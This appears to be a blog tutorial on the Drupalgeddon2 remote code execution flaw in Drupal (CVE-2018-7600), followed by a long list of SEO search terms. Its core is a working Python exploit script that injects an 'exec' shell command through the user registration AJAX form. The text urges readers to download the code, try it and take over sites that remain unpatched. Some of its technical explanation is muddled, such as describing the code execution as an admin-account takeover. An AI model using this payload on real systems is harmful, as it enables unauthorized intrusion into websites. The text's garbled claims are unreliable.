Drupalgeddon2 Exploit Tutorial

drupalgeddon2 flaw on drupal

Drupalgeddon2 the hackening is an update rolled to all Drupal users to address one of the major flaw found in Drupal few days back.

Thesecurity misconduct almost affected all the 1 million available users of Drupal. The flaw was discovered by one of the Drupal’s researcher.

The flaw is a Remote Code Execution which allowed any attacker to take over a entire Drupal site. The RCE worked on all versions of Drupal from 6.x to 8.x.

In general, it affects all versions of Drupal except 7.58 and 8.5.1.The execution of this attack doesn’t even require any logging in or any other forms of authentication.

The exploitation is quite simple and does not contain any tedious work.  2 weeks later patching the flaw, the exploit code was released on Github by Vitalii Rudnykh.

Drupalgeddon2 Exploit Tutorial :

Here’s the Github link for the exploit code : https://github.com/a2u/CVE-2018-7600

Let’s take a look at the exploit code.

target = input(‘Enter target url (example: https://domain.ltd/): ‘)

url = target + ‘user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax’
payload = {‘form_id’: ‘user_register_form’, ‘_drupal_ajax’: ‘1’, ‘mail[#post_render][]’: ‘exec’, ‘mail[#type]’: ‘markup’, ‘mail[#markup]’: ‘echo “;-)” | tee hello.txt’}

r = requests.post(url, data=payload)
if r.status_code != 200:
sys.exit(“Not exploitable”)
print (‘\nCheck: ‘+target+’hello.txt’)

source : https://github.com/a2u/CVE-2018-7600

That’s it. This simple 9 lines of code was enough to take over 1 million Drupal websites before the patch was rolled out.

This exploit POC takes the target drupal website as input. After giving the input, “user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax” is added to the end of the URL and a POST request containing ” {‘form_id’: ‘user_register_form’, ‘_drupal_ajax’: ‘1’, ‘mail[#post_render][]’: ‘exec’, ‘mail[#type]’: ‘markup’, ‘mail[#markup]’ ” is made.

If the request returns a 200 response, the exploit has been completed successfully. This flaw allows the attacker to successfully take over the Admin’s account without any form of authentication.

Now you can take over the Drupal website. Hit to the Gitbhub repo and download the exploit code and test it yourself.

But all your test may end in vain since the patch has been rolled out already. Still, some websites which haven’t updated the patch may still remain vulnerable.

The security research centers around the world confers that after the release of POC, huge number of attempts have been made to exploit.

But they report that, as for now, no compromises has been detected and all the Drupal sites are safe till now.

Incoming search terms :

drupalgeddon exploit,
drupal geddon cms,
drupalgeddon patch,
drupalgeddon test,
drupalgeddon menu_router,
drupalgeddon database,
drupal geddon poc,
drupalgeddon fix,
drupal seddon impact,
drupal geddon help.api.php,
drupal geddon attack,
acquia drupal geddon,
drupalgeddon bug,
drupalgeddon backdoor,
drupal geddon bbc,
drupalgeddon check,
drupalgeddon commands,
drupal geddon configure,
drupal geddon file_put_contents,
drupal check drupalgeddon,
drupalgeddon drupal 6,
drush drupal geddon,
drupalgeddon drupal dev,
drupalgeddon what to do,
drupal 7 drupal geddon,
drupalgeddon examples,
drupal geddon flowchart,
drupalgeddon hack,
how to use drupal geddon,
htaccess drupal geddon,
github drupalgeddon,
install drupal geddon,
i survived drupalgeddon,
drupalgeddon module,
drupalgeddon project,
pantheon drupal geddon,
php drupal geddon,
drupalgeddon recovery,
reddit drupal geddon,
drupal geddon scan,
drupalgeddon script,
survived drupalgeddon,
drupalgeddon tutorial,
drupalgeddon version,
drupal 6 drupalgeddon,
drupal 7 drupalgeddon,


Please enter your comment!
Please enter your name here

This site uses Akismet to reduce spam. Learn how your comment data is processed.